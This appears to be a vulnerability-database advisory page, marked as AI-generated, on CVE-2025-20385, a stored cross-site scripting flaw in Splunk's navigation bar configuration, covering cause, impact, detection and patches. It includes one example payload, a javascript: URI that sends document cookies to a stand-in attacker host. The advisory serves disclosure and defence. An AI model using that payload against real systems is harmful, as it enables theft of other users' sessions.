
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-20385 is a stored Cross-Site Scripting (XSS) vulnerability in Splunk Enterprise and Splunk Cloud Platform, classified as CWE-79. A user holding the high-privilege admin_all_objects capability can craft a malicious payload via the href attribute of an anchor tag within a navigation bar collection, causing unauthorized JavaScript to execute in another user's browser. Affected versions include Splunk Enterprise below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform below 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117. The vulnerability was disclosed on December 3, 2025, with a CVSS v3.1 base score of 4.8 (Medium) per NIST NVD, and 2.4 (Low) per the CNA (Cisco/Splunk) (Splunk Advisory).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically within the navigation bar collection configuration in Splunk's web interface. An attacker with the admin_all_objects role can inject a malicious JavaScript payload into the href attribute of an anchor tag in a navigation bar collection; when another user navigates the Splunk interface and interacts with the affected navigation element, the injected script executes in their browser context. This is a stored XSS variant, meaning the payload persists server-side and triggers on subsequent page loads without further attacker interaction. Exploitation requires high privileges (the admin_all_objects capability) and user interaction from a victim, limiting the attack surface (Splunk Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the compromised navigation bar, potentially leading to session cookie theft, credential harvesting, unauthorized actions performed on behalf of the victim, and limited data exposure. The confidentiality and integrity impacts are rated low, and there is no direct availability impact. Because the attack targets other users' browser sessions rather than the server directly, lateral movement within Splunk (e.g., accessing data or dashboards as the victim) is a realistic secondary consequence (Splunk Advisory).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the disclosure date (Splunk Advisory). The EPSS score is approximately 0.033%, reflecting a very low probability of exploitation in the near term. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The requirement for the admin_all_objects high-privilege role significantly constrains the exploitable attack surface.
admin_all_objects capability, either through credential theft, privilege escalation, or insider access.href attribute within a navigation bar collection to include a JavaScript URI payload, such as javascript:document.location='https://attacker.com/steal?c='+document.cookie.admin_all_objects privileges; review _audit index for action=edit events on navigation objects.default.xml or local.xml under $SPLUNK_HOME/etc/apps/<app>/default/data/ui/nav/) containing javascript: URI schemes in href attributes.Splunk has released patched versions addressing this vulnerability: Splunk Enterprise 10.0.2, 9.4.6, 9.3.8, and 9.2.10; Splunk Cloud Platform 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117. Organizations should upgrade to these versions immediately. As interim mitigations, limit and audit accounts holding the admin_all_objects capability, implement strict input validation for navigation bar configurations, and review user permissions to enforce least privilege (Splunk Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."